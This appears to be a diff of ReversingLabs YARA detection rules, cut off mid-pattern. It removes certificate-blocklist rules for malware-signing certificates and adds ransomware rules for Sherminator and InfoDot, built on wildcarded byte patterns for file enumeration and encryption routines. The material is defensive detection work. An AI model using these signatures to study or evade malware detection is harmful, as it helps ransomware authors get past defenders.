"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5366-L5384" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "63741513f3ab2f51ecd66dc973239c9dc194b86504fe26b2dd4a7f31299e5497" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sherminator.yara#L1-L157" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "22ac61b95f6ca4530e81a23fdd05be93e368647ca7100097a94eae3c6ce3b7d1" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sherminator" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LLC \"MILKY PUT\"" and (pe.signatures[i].serial=="00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" or pe.signatures[i].serial=="d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5") and 1601596800<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5B440A47E8Ce3Dd202271E5C7A666C78 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "6f9852cb-277d-5942-b3f7-525593a41027" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5386-L5402" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "eb4387d58e391c356ed774d8c13bb4bbb2befed585bb44674459d3ef519aec58" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $enum_resources_p1 = { + 55 89 E5 57 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 + ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? + ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C7 44 24 ?? + ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 54 + 24 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 + 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 + } + $enum_resources_p2 = { + 45 ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 + ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? 8B 15 ?? + ?? ?? ?? 8B 0D ?? ?? ?? ?? C1 E1 ?? 8D 1C 0A C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? + ?? ?? ?? 89 03 A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 00 85 C0 0F 84 ?? + ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 50 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? + ?? ?? C1 E1 ?? 01 C8 8B 00 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 + ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 10 89 D0 B9 ?? ?? ?? ?? 89 C3 B8 ?? ?? ?? ?? 89 DF F2 + AE 89 C8 F7 D0 83 E8 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 83 C0 ?? A3 ?? ?? ?? ?? + 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 83 E0 ?? 85 C0 74 ?? 8B 45 ?? C1 E0 + ?? 89 C2 8B 45 ?? 01 D0 89 04 24 E8 ?? ?? ?? ?? EB ?? 90 83 45 ?? ?? 8B 45 ?? 39 45 + ?? 0F 82 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? + ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 90 90 8D 65 ?? 5B 5F 5D C3 + } + $encrypt_files_p1 = { + 55 89 E5 57 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? + ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? + ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 + ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 + D0 66 C7 00 ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? + 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 + 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 89 55 + ?? 83 7D ?? ?? 7F ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 77 ?? C7 44 24 ?? ?? ?? ?? ?? 8B + 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 + ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? + 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 45 ?? ?? ?? ?? ?? DF 6D ?? + DD 5D ?? DD 45 ?? DD 05 ?? ?? ?? ?? DF E9 DD D8 76 ?? 8B 45 ?? 89 45 ?? EB ?? C7 45 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 + 7D ?? ?? 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC + } + $encrypt_files_p2 = { + 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF + D0 C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 15 ?? + ?? ?? ?? A1 ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? C7 04 24 ?? + ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? + ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? + ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 04 24 ?? ?? ?? ?? A1 + ?? ?? ?? ?? FF D0 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 + 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 + 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B + 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 + ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? + ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 + 7D ?? ?? 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 + 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 + } + $encrypt_files_p3 = { + 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC + ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? + A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 39 55 ?? 7F ?? 39 55 ?? 7C ?? 39 + 45 ?? 77 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? + 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? + 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 29 45 ?? + 19 55 ?? 83 7D ?? ?? 0F 8F ?? ?? ?? ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? + ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? + ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 + } + $find_files_p1 = { + 55 89 E5 57 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 + ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 + E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 + 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? + 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 D0 C7 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F + 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F B6 95 ?? ?? ?? + ?? 0F B6 05 ?? ?? ?? ?? 0F B6 D2 0F B6 C0 29 C2 89 D0 85 C0 0F 84 ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? + 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 + E0 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? + ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 + } + $find_files_p2 = { + E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? + 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 + ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D + 50 ?? 8B 45 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? + C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 + } + $find_files_p3 = { + 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 + 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 + C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B + 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 + 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 + ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 EB + ?? 90 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? + 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 + 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Master Networking s.r.o." and pe.signatures[i].serial=="5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" and 1601895571<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_resources_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B82C6553B2186C219797621Aaa233Edb : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Infodot : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects InfoDot ransomware." author = "ReversingLabs" - id = "e1dd9783-078f-582e-8493-7c493cda9c62" - date = "2023-11-08" - modified = "2023-11-08" + id = "2f6447f4-523b-5ea1-a16d-d68bb9bcc79d" + date = "2021-02-16" + modified = "2021-02-16" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5404-L5422" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "72e3e1740a4adc4315d2dd9c9f7b8cee2d89c3006014dec663b70d3419f43ca3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.InfoDot.yara#L1-L115" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24a1c25c1d70c21323417ae0892c613361c4bfc829737ef86b6fa7616ae668c6" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "InfoDot" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MC Commerce SP Z o o" and (pe.signatures[i].serial=="00:b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" or pe.signatures[i].serial=="b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db") and 1585785600<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_F360F7Ad0Ed065Fec0B44F98E04481A0 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "96219c86-f463-5f11-950d-ca2af75d5559" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5424-L5442" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2a25f1121f492dec461e570ff56acb0e3957cdf9100002f2ff0b6c3d3b35fee5" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 8B D9 89 9D ?? ?? ?? ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 FF D3 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? EB + ?? 8D 49 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 + ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? + ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 + ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 + C0 74 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 + ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 + 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 50 FF 15 + } + $find_files_p2 = { + 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 56 50 FF D7 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 FF D3 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? F6 85 ?? ?? + ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? 50 56 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 FF D7 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 + EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 + 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 99 83 C4 ?? 0B + C2 75 ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 83 CB ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? 8B CF 8D A4 24 + ?? ?? ?? ?? 66 8B 31 66 3B 32 75 ?? 66 85 F6 74 ?? 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 + } + $find_files_p3 = { + C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 + ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 + ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 + C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? + 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 + EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? + 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? + ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 0F 66 3B 08 75 ?? 66 85 C9 74 ?? 66 8B 4F ?? 66 3B 48 + ?? 75 ?? 83 C7 ?? 83 C0 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 DB 7F ?? 8B 95 ?? ?? ?? ?? 7C ?? 81 + } + $find_files_p4 = { + FA ?? ?? ?? ?? 73 ?? 3B D8 0F 8F ?? ?? ?? ?? 7C ?? 3B D1 73 ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 EC ?? 8D 95 ?? ?? ?? ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? + ?? 83 C4 ?? 84 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 3B D8 7F + ?? 7C ?? 8B 85 ?? ?? ?? ?? 3B C1 73 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 85 